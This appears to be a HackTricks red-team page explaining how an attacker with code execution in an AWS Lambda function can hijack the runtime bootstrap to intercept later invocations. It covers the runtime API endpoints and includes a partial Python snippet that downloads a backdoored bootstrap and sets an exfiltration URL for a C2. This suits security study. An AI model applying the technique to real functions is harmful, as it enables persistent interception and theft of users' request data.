AWS - Steal Lambda Requests

Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)!

Other ways to support HackTricks:

Lambda Flow

  1. Slicer is a process outside the container that send invocations to the init process.

  2. The init process listens on port 9001 exposing some interesting endpoints:

    • /2018-06-01/runtime/invocation/next – get the next invocation event

    • /2018-06-01/runtime/invocation/{invoke-id}/response – return the handler response for the invoke

    • /2018-06-01/runtime/invocation/{invoke-id}/error – return an execution error

  3. has a loop getting invocations from the init process and calls the users code to handle them (/next).

  4. Finally, sends to init the response

Note that bootstrap loads the user code as a module, so any code execution performed by the users code is actually happening in this process.

Stealing Lambda Requests

The goal of this attack is to make the users code execute a malicious process inside the process that handle the vulnerable request. This way, the malicious bootstrap process will start talking with the init process to handle the requests while the legit bootstrap is trapped running the malicious one, so it won't ask for requests to the init process.

This is a simple task to achieve as the code of the user is being executed by the legit process. So the attacker could:

  • Send a fake result of the current invocation to the init process, so init thinks the bootstrap process is waiting for more invocations.

    • A request must be sent to /${invoke-id}/response

    • The invoke-id can be obtained from the stack of the legit process using the inspect python module (as proposed here) or just requesting it again to /2018-06-01/runtime/invocation/next (as proposed here).

  • Execute a malicious which will handle the next invocations

    • For stealthiness purposes it's possible to send the lambda invocations parameters to an attackers controlled C2 and then handle the requests as usual.

    • For this attack, it's enough to get the original code of from the system or github, add the malicious code and run it from the current lambda invocation.

Attack Steps

  1. Find a RCE vulnerability.

  2. Execute the malicious bootstrap.

You can easily perform these actions running:

python3 <<EOF
import os
import urllib3

# Download backdoored bootstrap
http = urllib3.PoolManager()
backdoored_bootstrap_url = ""
new_runtime = http.request('GET', backdoored_bootstrap_url).data

# Load new bootstrap
os.environ['URL_EXFIL'] = ""


For more info check


Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)!

Other ways to support HackTricks:

Last updated